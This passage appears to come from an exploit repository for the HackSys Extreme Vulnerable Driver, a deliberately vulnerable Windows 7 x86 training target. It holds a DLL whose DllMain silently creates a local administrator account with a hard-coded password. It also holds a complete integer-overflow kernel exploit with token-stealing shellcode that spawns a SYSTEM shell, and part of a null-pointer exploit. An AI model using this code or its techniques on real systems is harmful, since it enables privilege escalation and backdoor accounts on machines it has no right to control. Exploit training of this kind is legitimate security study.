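        NULL,               // default process security
        NULL,               // default thread security
        FALSE,              // do not inherit handles
        CREATE_NEW_CONSOLE,
        NULL,               // inherit environment
        workingDirectory,
        &startupInfo,
        &processInfo);

    if (created)
    {
        // Block until the child exits, then release both handles so the
        // process and thread objects can go away.
        ::WaitForSingleObject(processInfo.hProcess, INFINITE);
        ::CloseHandle(processInfo.hProcess);
        ::CloseHandle(processInfo.hThread);
    }

    return created;
}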
35 | }
36 |
// DLL entry point. On DLL_PROCESS_ATTACH it synchronously runs two net.exe
// commands - create local user "hevdtest", then add it to Administrators -
// and always returns TRUE so the load succeeds. Other notifications are
// ignored, and the ExecuteCommand results are not checked, so a failure
// (for example the account already existing) is silent.
//
// NOTE(review): this is a deliberate injected-payload pattern, but it is
// outside what DllMain is permitted to do: CreateProcess and
// WaitForSingleObject are called while the loader lock is held, which can
// deadlock the host process. The credentials are hard-coded, and the full
// command lines (password included) are visible to process-creation
// auditing. Lab-only code; remove the account after the test.
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD dwReason,
                      LPVOID lpReserved
) {
    UNREFERENCED_PARAMETER(hModule);
    UNREFERENCED_PARAMETER(lpReserved);

    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
    {
        // Arrays rather than string literals: CreateProcessW may write into
        // the command line buffer.
        wchar_t addUserCommand[] = L"C:\\Windows\\System32\\net.exe user hevdtest Password123! /add";
        wchar_t addGroupCommand[] = L"C:\\Windows\\System32\\net.exe localgroup Administrators hevdtest /add";
        ExecuteCommand(addUserCommand);
        ExecuteCommand(addGroupCommand);
        break;
    }
    default:
        break;
    }

    return TRUE;
}
50 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include
6 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 |
3 | #include "pch.h"
4 |
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h: This is a precompiled header file.
2 | // Files listed below are compiled only once, improving build performance for future builds.
3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InsecureKernelResourceAccess/InsecureKernelResourceAccess.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}
8 | Exe
9 | InsecureKernelResourceAccess
10 | InsecureKernelResourceAccess
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x86\Debug\
18 | DEBUG;TRACE
19 | full
20 | x86
21 | 7.3
22 | prompt
23 |
24 |
25 | ..\bin\x86\Release\
26 | TRACE
27 | true
28 | pdbonly
29 | x86
30 | 7.3
31 | prompt
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InsecureKernelResourceAccess/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
// Assembly identity for the InsecureKernelResourceAccess exploit project.
// Description, company and trademark are left at the template defaults (empty).
[assembly: AssemblyTitle("InsecureKernelResourceAccess")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("InsecureKernelResourceAccess")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
// Kept false: nothing in this console exploit is meant to be reachable via COM.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It matches the project GUID used for InsecureKernelResourceAccess in
// HEVD_Win7x86.sln and in InsecureKernelResourceAccess.csproj.
[assembly: Guid("a3affc5e-b6ff-42ac-8ea0-7afda96ea3f1")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// A fixed version (no '*') is used, so rebuilding does not change the assembly identity.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/IntegerOverflow/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/IntegerOverflow/IntegerOverflow.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {22CE436A-76BF-46D8-B7DC-86330B55C523}
8 | Exe
9 | IntegerOverflow
10 | IntegerOverflow
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | x86
18 | ..\bin\x86\Debug\
19 |
20 |
21 | x86
22 | ..\bin\x86\Release\
23 | TRACE
24 | true
25 | pdbonly
26 | true
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/IntegerOverflow/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 |
5 | namespace IntegerOverflow
6 | {
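/// <summary>
/// HEVD "Integer Overflow" exploit for Windows 7 SP1 x86. Stages token-stealing
/// shellcode in user memory, opens the HEVD device and sends IOCTL 0x222027
/// with a buffer length of -1 so the driver's length check wraps and the
/// payload overwrites a kernel stack pointer with the shellcode address.
/// </summary>
/// <remarks>
/// Changes from the original: STARTUPINFO.cb is now set before CreateProcess
/// (it was left 0), IsWin7x86 rejects a WOW64 process on 64-bit Windows 7
/// (the old PROCESSOR_ARCHITECTURE check passed there), the device handle is
/// only stored in hDevice after CreateFile succeeded, and the misspelled
/// FILE_FLAG_OVERWRAPPED local became FILE_FLAG_OVERLAPPED (same value).
/// </remarks>
class Program
{
    // ------------------------------------------------------------------
    // Win32 structures; layouts mirror the native definitions.
    // ------------------------------------------------------------------

    [StructLayout(LayoutKind.Sequential)]
    struct SECURITY_ATTRIBUTES
    {
        public int nLength;                 // sizeof(SECURITY_ATTRIBUTES), set before use
        public IntPtr lpSecurityDescriptor; // left null: default security
        public int bInheritHandle;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public int cb;                      // sizeof(STARTUPINFO), set before use
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public int dwX;
        public int dwY;
        public int dwXSize;
        public int dwYSize;
        public int dwXCountChars;
        public int dwYCountChars;
        public int dwFillAttribute;
        public int dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;             // owned by the caller; must be closed
        public IntPtr hThread;              // owned by the caller; must be closed
        public int dwProcessId;
        public int dwThreadId;
    }

    // ------------------------------------------------------------------
    // P/Invoke declarations
    // ------------------------------------------------------------------

    // Undocumented ntdll export returning the NT version numbers. IsWin7x86
    // masks BuildNumber to its low 16 bits because the high bits are not part
    // of the build number (presumably flag bits).
    [DllImport("ntdll.dll")]
    static extern void RtlGetNtVersionNumbers(
        ref int MajorVersion,
        ref int MinorVersion,
        ref int BuildNumber);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(
        IntPtr lpAddress,
        uint dwSize,
        uint flAllocationType,
        uint flProtect);

    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    static extern IntPtr CreateFile(
        string lpFileName,
        uint dwDesiredAccess,
        uint dwShareMode,
        IntPtr lpSecurityAttributes,
        uint dwCreationDisposition,
        uint dwFlagsAndAttributes,
        IntPtr hTemplateFile);

    // InBuffer is a managed byte[]; the marshaller pins it for the duration of
    // this synchronous call. nInBufferSize is deliberately a signed int so
    // Main can pass -1 (0xFFFFFFFF) as the overflowing length.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DeviceIoControl(
        IntPtr hDevice,
        uint dwIoControlCode,
        byte[] InBuffer,
        int nInBufferSize,
        IntPtr OutBuffer,
        int nOutBufferSize,
        ref int pBytesReturned,
        IntPtr lpOverlapped);

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern bool CreateProcess(
        string lpApplicationName,
        string lpCommandLine,
        ref SECURITY_ATTRIBUTES lpProcessAttributes,
        ref SECURITY_ATTRIBUTES lpThreadAttributes,
        bool bInheritHandles,
        uint dwCreationFlags,
        IntPtr lpEnvironment,
        string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo,
        out PROCESS_INFORMATION lpProcessInformation);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);

    // ------------------------------------------------------------------
    // Global state
    // ------------------------------------------------------------------

    // Open handle to the HEVD device, or IntPtr.Zero. CreateFile signals
    // failure with INVALID_HANDLE_VALUE (-1), so Main validates the result
    // before storing it here; CleanUp only ever sees a real handle or zero.
    static IntPtr hDevice = IntPtr.Zero;

    // ------------------------------------------------------------------
    // Helpers
    // ------------------------------------------------------------------

    /// <summary>Closes the device handle if one is open. Failure is logged, not fatal.</summary>
    static void CleanUp()
    {
        Console.WriteLine("[>] Cleaning up handle object(s)");
        if (hDevice == IntPtr.Zero)
        {
            return;
        }

        if (CloseHandle(hDevice))
        {
            hDevice = IntPtr.Zero;
        }
        else
        {
            Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
        }
    }

    /// <summary>
    /// Gates execution to Windows 7 SP1 (6.1.7601) running natively as x86.
    /// The shellcode hard-codes kernel structure offsets for that build, so
    /// running anywhere else would most likely crash the target.
    /// </summary>
    /// <remarks>
    /// This binary is built as x86, so under WOW64 on a 64-bit Windows 7
    /// PROCESSOR_ARCHITECTURE still reports "x86". PROCESSOR_ARCHITEW6432 is
    /// only defined inside WOW64 and is used to reject that case, which the
    /// original check let through.
    /// </remarks>
    static bool IsWin7x86()
    {
        string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
        string wow64Arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432");
        int major = 0;
        int minor = 0;
        int build = 0;
        RtlGetNtVersionNumbers(ref major, ref minor, ref build);
        build &= 0xFFFF;

        bool isWin7Sp1 = major == 6 && minor == 1 && build == 7601;
        bool isNativeX86 = string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0
                           && string.IsNullOrEmpty(wow64Arch);

        if (isWin7Sp1 && isNativeX86)
        {
            Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
            return true;
        }

        Console.WriteLine("[-] Unsupported OS is detected");
        return false;
    }

    /// <summary>
    /// True when the current user name is SYSTEM; used to tell whether the
    /// token swap performed by the shellcode took effect.
    /// </summary>
    static bool IsSystem()
    {
        return string.Compare(Environment.UserName, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0;
    }

    /// <summary>
    /// Starts cmd.exe in a new console (inheriting this process's, now
    /// SYSTEM, token). Returns the CreateProcess result. The child's handles
    /// are closed after a short wait; the shell keeps running on its own.
    /// </summary>
    static bool SpawnShell()
    {
        const uint CREATE_NEW_CONSOLE = 0x00000010;
        string applicationName = "C:\\Windows\\System32\\cmd.exe";
        string currentDirectory = "C:\\Windows\\System32";

        SECURITY_ATTRIBUTES processAttributes = new SECURITY_ATTRIBUTES();
        SECURITY_ATTRIBUTES threadAttributes = new SECURITY_ATTRIBUTES();
        STARTUPINFO startupInfo = new STARTUPINFO();
        processAttributes.nLength = Marshal.SizeOf(processAttributes);
        threadAttributes.nLength = Marshal.SizeOf(threadAttributes);
        // CreateProcess expects cb to hold the structure size; the original
        // left it at 0.
        startupInfo.cb = Marshal.SizeOf(startupInfo);

        bool created = CreateProcess(
            applicationName, null, ref processAttributes, ref threadAttributes, false,
            CREATE_NEW_CONSOLE, IntPtr.Zero, currentDirectory,
            ref startupInfo, out PROCESS_INFORMATION processInfo);

        if (created)
        {
            Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", processInfo.dwProcessId);
            WaitForSingleObject(processInfo.hProcess, 500);
            CloseHandle(processInfo.hProcess);
            CloseHandle(processInfo.hThread);
        }
        else
        {
            Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
        }

        return created;
    }

    // ------------------------------------------------------------------
    // Entry point
    // ------------------------------------------------------------------

    static void Main()
    {
        // Token-stealing shellcode for Windows 7 SP1 x86. The offsets encoded
        // in it (fs:[0x124] KTHREAD, +0x50 EPROCESS, +0xF8 Token, +0xB8
        // ActiveProcessLinks, +0xB4 UniqueProcessId) are specific to that
        // build, which is why IsWin7x86() gates everything. The load into ebx
        // is never used afterwards (popad restores it). The trailing
        // popad / pop ebp / ret 8 is the recovery epilogue and must match the
        // frame whose return address is overwritten - verify against the HEVD
        // build in use.
        byte[] shellcode = {
            //--[Setup]
            0x60,                                   // pushad
            0x64, 0xA1, 0x24, 0x01, 0x00, 0x00,     // mov eax, fs:[KTHREAD_OFFSET]
            0x8B, 0x40, 0x50,                       // mov eax, [eax + EPROCESS_OFFSET]
            0x89, 0xC1,                             // mov ecx, eax (current _EPROCESS)
            0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00,     // mov ebx, [eax + TOKEN_OFFSET]
            //--[Copy System PID token]
            0xBA, 0x04, 0x00, 0x00, 0x00,           // mov edx, 4 (SYSTEM PID)
            0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,     // mov eax, [eax + FLINK_OFFSET] <-|
            0x2D, 0xB8, 0x00, 0x00, 0x00,           // sub eax, FLINK_OFFSET            |
            0x39, 0x90, 0xB4, 0x00, 0x00, 0x00,     // cmp [eax + PID_OFFSET], edx      |
            0x75, 0xED,                             // jnz                            ->|
            0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00,     // mov edx, [eax + TOKEN_OFFSET]
            0x89, 0x91, 0xF8, 0x00, 0x00, 0x00,     // mov [ecx + TOKEN_OFFSET], edx
            //--[Recover]
            0x61,                                   // popad
            0x5D,                                   // pop ebp
            0xC2, 0x08, 0x00                        // ret 8
        };

        Console.WriteLine("--[ HEVD Exploitation : Integer Overflow\n");

        if (!IsWin7x86())
        {
            return;
        }

        // Step 1: executable page for the shellcode. The kernel returns
        // straight into this user-mode page, which only works because the
        // target does not enforce SMEP.
        const uint ALLOC_SIZE = 0x1000;
        const uint MEM_COMMIT = 0x00001000;
        const uint MEM_RESERVE = 0x00002000;
        const uint PAGE_EXECUTE_READWRITE = 0x40;

        Console.WriteLine("[>] Trying to allocate shellcode");
        IntPtr shellcodeBuffer = VirtualAlloc(IntPtr.Zero, ALLOC_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (shellcodeBuffer == IntPtr.Zero)
        {
            Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
            return;
        }

        Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", ALLOC_SIZE, shellcodeBuffer.ToString("X8"));
        Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
        Console.WriteLine("[+] Shellcode is allocated at 0x{0}", shellcodeBuffer.ToString("X8"));

        // Step 2: payload = 0x824 bytes of filler up to the kernel pointer the
        // overflow clobbers (presumably the saved return address, given the
        // ret-based recovery epilogue), the shellcode address, then the
        // 0xBAD0B0B0 terminator that presumably tells the driver's copy loop
        // where to stop. Confirm the terminator value against the HEVD source.
        byte[] filler = Encoding.ASCII.GetBytes(new string('A', 0x824));
        byte[] shellcodeAddress = BitConverter.GetBytes(shellcodeBuffer.ToInt32());
        byte[] terminator = BitConverter.GetBytes((uint)0xBAD0B0B0);
        byte[] payload = new byte[filler.Length + shellcodeAddress.Length + terminator.Length];
        Array.Copy(filler, 0, payload, 0, filler.Length);
        Array.Copy(shellcodeAddress, 0, payload, filler.Length, shellcodeAddress.Length);
        Array.Copy(terminator, 0, payload, filler.Length + shellcodeAddress.Length, terminator.Length);

        // Step 3: open the device.
        // NOTE(review): the handle is opened with FILE_FLAG_OVERLAPPED but
        // DeviceIoControl is called with lpOverlapped = NULL, which the API
        // contract only guarantees for non-overlapped handles. It works with
        // HEVD in practice; the flag is not needed and could be dropped.
        string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
        const uint GENERIC_READ = 0x80000000;
        const uint GENERIC_WRITE = 0x40000000;
        const uint FILE_SHARE_READ = 0x00000001;
        const uint FILE_SHARE_WRITE = 0x00000002;
        const uint OPEN_EXISTING = 0x3;
        const uint FILE_ATTRIBUTE_NORMAL = 0x80;
        const uint FILE_FLAG_OVERLAPPED = 0x40000000;
        IntPtr invalidHandle = new IntPtr(-1);   // INVALID_HANDLE_VALUE

        Console.WriteLine("[>] Opening {0}", deviceName);
        IntPtr device = CreateFile(
            deviceName, GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
            OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, IntPtr.Zero);

        if (device == invalidHandle)
        {
            Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
            return;
        }
        hDevice = device;

        Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));

        // Step 4: the "integer overflow" is in the length argument. -1
        // marshals as 0xFFFFFFFF; a driver-side check of the form
        // (Size + sizeof(terminator)) > sizeof(KernelBuffer) then wraps to a
        // tiny value and passes, after which the copy runs past the kernel
        // buffer until it meets the terminator. (Inferred from the payload
        // layout - confirm against the HEVD source.) Note the I/O manager
        // does not validate the length for this transfer type, so the call
        // reaches the driver.
        const uint IOCTL_INTEGER_OVERFLOW = 0x222027;
        int bytesReturned = 0;

        Console.WriteLine("[>] Triggering integer overflow");
        bool sent = DeviceIoControl(hDevice, IOCTL_INTEGER_OVERFLOW, payload, -1, IntPtr.Zero, 0, ref bytesReturned, IntPtr.Zero);

        if (!sent)
        {
            // Read the error before CleanUp, whose CloseHandle would overwrite it.
            Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
            CleanUp();
            return;
        }
        CleanUp();

        // Step 5: only spawn a shell if the token swap is visible from here.
        if (IsSystem() && SpawnShell())
        {
            Console.WriteLine("[+] Exploit is completed successfully");
        }
        else
        {
            Console.WriteLine("[-] Failed to exploit");
        }
    }
}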
300 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/IntegerOverflow/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly-level metadata for the IntegerOverflow executable. Only the title, product,
// copyright and version attributes carry values; the remaining descriptive attributes are
// empty strings.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("IntegerOverflow")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("IntegerOverflow")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("22ce436a-76bf-46d8-b7dc-86330b55c523")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/NullPointerDereference/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/NullPointerDereference/NullPointerDereference.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {F94165C3-2308-46DE-9D72-DC71C96E537A}
8 | Exe
9 | NullPointerDereference
10 | NullPointerDereference
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/NullPointerDereference/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 |
5 | namespace NullPointerDereference
6 | {
class Program
{
    // Native SECURITY_ATTRIBUTES. nLength is filled in with Marshal.SizeOf before the
    // struct is handed to CreateProcess (see SpawnShell).
    [StructLayout(LayoutKind.Sequential)]
    struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr lpSecurityDescriptor;
        public int bInheritHandle;
    }

    // Native STARTUPINFO with Unicode string fields. SpawnShell passes a zero-initialised
    // instance, so every field including cb is 0 at the CreateProcess call.
    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
    struct STARTUPINFO
    {
        public int cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public int dwX;
        public int dwY;
        public int dwXSize;
        public int dwYSize;
        public int dwXCountChars;
        public int dwYCountChars;
        public int dwFillAttribute;
        public int dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    // Native PROCESS_INFORMATION filled by CreateProcess; SpawnShell closes both handles.
    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }

    // ntdll export (not part of the documented Win32 surface) used for the exact build
    // check in IsWin7x86.
    [DllImport("ntdll.dll")]
    static extern void RtlGetNtVersionNumbers(
        ref int MajorVersion,
        ref int MinorVersion,
        ref int BuildNumber);

    // Allocates the RWX buffer that receives the shellcode (Main, Step 1).
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(
        IntPtr lpAddress,
        uint dwSize,
        uint flAllocationType,
        uint flProtect);

    // Native system call wrapper. Main uses it (rather than VirtualAlloc) to request a base
    // address inside the first page (Step 2). The return value is an NTSTATUS, not a Win32
    // error code, so Marshal.GetLastWin32Error is not meaningful after this call.
    [DllImport("ntdll.dll")]
    static extern uint NtAllocateVirtualMemory(
        IntPtr ProcessHandle,
        ref IntPtr BaseAddress,
        uint ZeroBits,
        ref uint AllocationSize,
        uint flAllocationType,
        uint Protect);

    // Opens the HEVD device object (Main, Step 3).
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    static extern IntPtr CreateFile(
        string lpFileName,
        uint dwDesiredAccess,
        uint dwShareMode,
        IntPtr lpSecurityAttributes,
        uint dwCreationDisposition,
        uint dwFlagsAndAttributes,
        IntPtr hTemplateFile);

    // Sends the trigger IOCTL (Main, Step 4). InBuffer is marshalled from a managed byte[].
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DeviceIoControl(
        IntPtr hDevice,
        uint dwIoControlCode,
        byte[] InBuffer,
        int nInBufferSize,
        IntPtr OutBuffer,
        int nOutBufferSize,
        ref int pBytesReturned,
        IntPtr lpOverlapped);

    // Starts cmd.exe once the identity check in Step 5 has passed (SpawnShell).
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern bool CreateProcess(
        string lpApplicationName,
        string lpCommandLine,
        ref SECURITY_ATTRIBUTES lpProcessAttributes,
        ref SECURITY_ATTRIBUTES lpThreadAttributes,
        bool bInheritHandles,
        uint dwCreationFlags,
        IntPtr lpEnvironment,
        string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo,
        out PROCESS_INFORMATION lpProcessInformation);

    // Handle release for the device handle (CleanUp) and the process/thread handles (SpawnShell).
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    // Short bounded wait on the spawned process (SpawnShell); the return value is ignored there.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);

    // Global variables
    // Handle to the HEVD device: IntPtr.Zero when not held, assigned in Main (Step 3) and
    // released by CleanUp. A failed CreateFile stores INVALID_HANDLE_VALUE (-1) here, which
    // CleanUp would pass straight to CloseHandle; Main returns without CleanUp in that path,
    // so the case is not reached today.
    static IntPtr hDevice = IntPtr.Zero;

    // Helper functions

    /// <summary>
    /// Closes the HEVD device handle if one is held and resets <see cref="hDevice"/> to
    /// IntPtr.Zero on success. A CloseHandle failure is only logged with the Win32 error
    /// code; the handle value is kept so the failure stays visible.
    /// </summary>
    static void CleanUp()
    {
        Console.WriteLine("[>] Cleaning up handle object(s)");
        if (hDevice != IntPtr.Zero)
        {
            if (CloseHandle(hDevice))
            {
                hDevice = IntPtr.Zero;
            }
            else
            {
                Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
            }
        }
    }

    /// <summary>
    /// Returns true only on Windows 7 SP1 (6.1.7601) in an x86 process; the shellcode offsets
    /// and the null-page technique used by Main are specific to that build. Prints which
    /// outcome was reached.
    /// </summary>
    /// <returns>true when the exact version and architecture match, false otherwise.</returns>
    static bool IsWin7x86()
    {
        // NOTE(review): PROCESSOR_ARCHITECTURE reflects the process, not the OS — a 32-bit
        // process under WOW64 also reports x86 — so this check alone does not prove a 32-bit
        // kernel. Confirm whether that matters for the callers.
        string arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
        int MajorVersion = 0;
        int MinorVersion = 0;
        int BuildNumber = 0;
        RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
        // The build number comes back with flag bits in its upper half; keep the 16-bit build.
        BuildNumber &= 0xFFFF;

        if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
            string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
        {
            Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
            return true;
        }
        else
        {
            Console.WriteLine("[-] Unsupported OS is detected");
            return false;
        }
    }

    /// <summary>
    /// Reports whether the current process identity is the SYSTEM account. Main calls this
    /// after the IOCTL has returned, so it is the success test for the token swap.
    /// </summary>
    /// <returns>true when Environment.UserName equals "SYSTEM" (case-insensitive).</returns>
    static bool IsSystem()
    {
        string user = Environment.UserName;

        if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
        {
            return true;
        }
        else
        {
            return false;
        }
    }

    /// <summary>
    /// Starts C:\Windows\System32\cmd.exe in a new console with System32 as its working
    /// directory, waits up to 500 ms on the process handle, then closes both returned handles.
    /// The child inherits whatever token this process holds at the time of the call.
    /// </summary>
    /// <returns>The CreateProcess result; the Win32 error code is printed on failure.</returns>
    static bool SpawnShell()
    {
        string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
        SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
        SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
        uint CREATE_NEW_CONSOLE = 0x00000010;
        string CurrentDirectory = "C:\\Windows\\System32";
        // NOTE(review): si.cb stays 0; the Win32 contract expects sizeof(STARTUPINFO) — confirm
        // this is intended.
        STARTUPINFO si = new STARTUPINFO();
        pSec.nLength = Marshal.SizeOf(pSec);
        tSec.nLength = Marshal.SizeOf(tSec);

        // No command line, no handle inheritance, inherited environment.
        bool status = CreateProcess(
            ApplicationName, null, ref pSec, ref tSec, false,
            CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
            ref si, out PROCESS_INFORMATION pi);

        if (status)
        {
            Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
            // Brief wait only; closing the handles does not end the shell.
            WaitForSingleObject(pi.hProcess, 500);
